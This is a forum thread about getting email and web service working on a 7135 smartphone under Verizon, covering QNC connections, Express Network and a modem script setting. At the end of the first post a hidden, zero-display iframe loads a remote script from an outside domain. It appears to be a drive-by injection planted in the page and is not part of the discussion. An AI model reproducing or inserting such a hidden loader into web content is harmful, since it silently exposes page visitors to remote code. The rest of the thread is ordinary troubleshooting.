+ Reply to Thread

Verizon Web/Email Service Issues

I recently activated the 7135 I purchased from Alltel and am having problems getting the email and web service setup. I have worked with Verizon support who said that technically this phone is not supported yet but were very patient and said they would just treat it as if it were a 6035. I get a fast busy signal or modem not found when trying multiple settings including setting up a new connection from scratch. I even tried to setup a connection using my dial up account that is linked to Road Runner and assigned in incoming/outgoing server, domain & local dial up number. No luck with that either. I can only send SMS messages.
    Anyone have any recommendations? Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Ok, read a bunch of posts and have changed the IP and port to the recommended. Still no luck. Also, No luck using the Wap, EIS Web or Eudora Web or Email. In EIS Web I get an error that states, "Error PPP timeout (0x1231)" When trying to connnect via preferences I get an error that states, "Authentication Error (0x1231) What do you use as your primary browser? I don't necessarily need web connection for surfing but for email send and receive capabilities. I am limited to SMS now and need to send and receive messages that are longer than SMS allows.

Originally posted by rbeirne
    Ok, read a bunch of posts and have changed the IP and port to the recommended. Still no luck. Also, No luck using the Wap, EIS Web or Eudora Web or Email. In EIS Web I get an error that states, "Error PPP timeout (0x1231)" When trying to connnect via preferences I get an error that states, "Authentication Error (0x1231) What do you use as your primary browser? I don't necessarily need web connection for surfing but for email send and receive capabilities. I am limited to SMS now and need to send and receive messages that are longer than SMS allows.
    Have you read this FAQ: http://www.smartphonesource.com/vbul...&threadid=5385

To use anything but the WAP browser, you will need to establish a QNC connection. To use the WAP browser, you will need Mobile Web service (I don't recommend it. You get far more functionality with a QNC connection and a decent browser.. Many threads on the pros and cons of each browser).

If you have Express Network service, start with this FAQ: http://www.smartphonesource.com/vbul...&threadid=5387 But I need to modify it to change this line in the script "Send: at$qnqnc=0"
    to "Send: at$qcqnc=0" (I need to ask a moderator to un-close the thread for me....) It will work with the original setting, but will be faster with the new one.

If you have Express network, you won't be able to also have Mobile Web and use the WAP browser.

Alan

QNC vs Mobile Web Services vs Express Net

What is the difference between the three.

I followed alanb instructions and was able to connect with qnc. But what is qnc, who is providing the service, is it billed as a regular phone call against my minutes. Are there any other extra charges.

Is Mobile Web Services(MWS) the $6.99 option to connect to the web, and what more will I get than qnc.

I believe HTML browser can only be used with Express Net, is it worth the price.

Using with Eudora Mail on Road Runner Dial up produces the following results for me. ....timed out looking up incoming/outgoing mail server, and with the Eudora web browser none of the pages can be found, yet the dialup remains connected.
    With QNC however, I can browse and get messages but cannot send them through the road runner account. I even plugged the script from qnc into the dial up of time warner. sure wish it would talk to the mail, if nothing else.

Thanks
    David

Originally posted by alanb
    Have you read this FAQ: http://www.smartphonesource.com/vbul...&threadid=5385

To use anything but the WAP browser, you will need to establish a QNC connection. To use the WAP browser, you will need Mobile Web service (I don't recommend it. You get far more functionality with a QNC connection and a decent browser.. Many threads on the pros and cons of each browser).

If you have Express Network service, start with this FAQ: http://www.smartphonesource.com/vbul...&threadid=5387 But I need to modify it to change this line in the script "Send: at$qnqnc=0"
    to "Send: at$qcqnc=0" (I need to ask a moderator to un-close the thread for me....) It will work with the original setting, but will be faster with the new one.

If you have Express network, you won't be able to also have Mobile Web and use the WAP browser.

Alan
    I had a problem with not making a qnc connection when digital roaming in a Verizon area away from my home city. I thought I would check the settings in my phone against this FAQ.

In script, I've got nothing. Could this be the problem? I can qnc connect at home with no problems.

Got mine all working now. Using Eudora web and your ISP is the way to go and you don't have to pay $6.95 per month. I am using a Road Runner dial up connection through Eudora. The problems were related to a difference in the string I was sending. The problems with WAP were related to an incorrect user id and password that was supplied to me by verizon. The guy who called me back 48 hours later was more than willing to do whatever it took to get my 7135 up and running. He was very knowledgable!